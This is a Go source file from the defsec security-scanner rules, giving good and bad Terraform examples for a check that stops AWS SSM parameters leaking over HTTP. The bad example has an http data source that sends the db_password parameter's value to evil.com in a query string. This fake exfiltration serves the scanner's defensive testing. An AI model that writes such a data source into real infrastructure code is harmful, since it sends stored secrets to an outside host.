github.com/khulnasoft-lab/defsec@v1.0.5-0.20230827010352-5e9f46893d95/rules/cloud/policies/aws/ssm/avoid_leaks_via_http.tf.go

github.com/khulnasoft-lab/defsec@v1.0.5-0.20230827010352-5e9f46893d95/rules/cloud/policies/aws/ssm/avoid_leaks_via_http.tf.go (about)

     1  package ssm
     2  
     3  var terraformAvoidLeaksViaHTTPGoodExamples = []string{
     4  	`
     5  resource "aws_ssm_parameter" "db_password" {
     6    name = "db_password"
     7    type = "SecureString"
     8    value = var.db_password
     9  }
    10  
    11   `,
    12  }
    13  
    14  var terraformAvoidLeaksViaHTTPBadExamples = []string{
    15  	`
    16  resource "aws_ssm_parameter" "db_password" {
    17    name = "db_password"
    18    type = "SecureString"
    19    value = var.db_password
    20  }
    21  
    22  data "http" "not_exfiltrating_data_honest" {
    23    url = "https://evil.com/?p=${aws_ssm_parameter.db_password.value}"
    24  }
    25   `,
    26  }
    27  
    28  var terraformAvoidLeaksViaHTTPLinks []string
    29  
    30  var terraformAvoidLeaksViaHTTPRemediationMarkdown = ``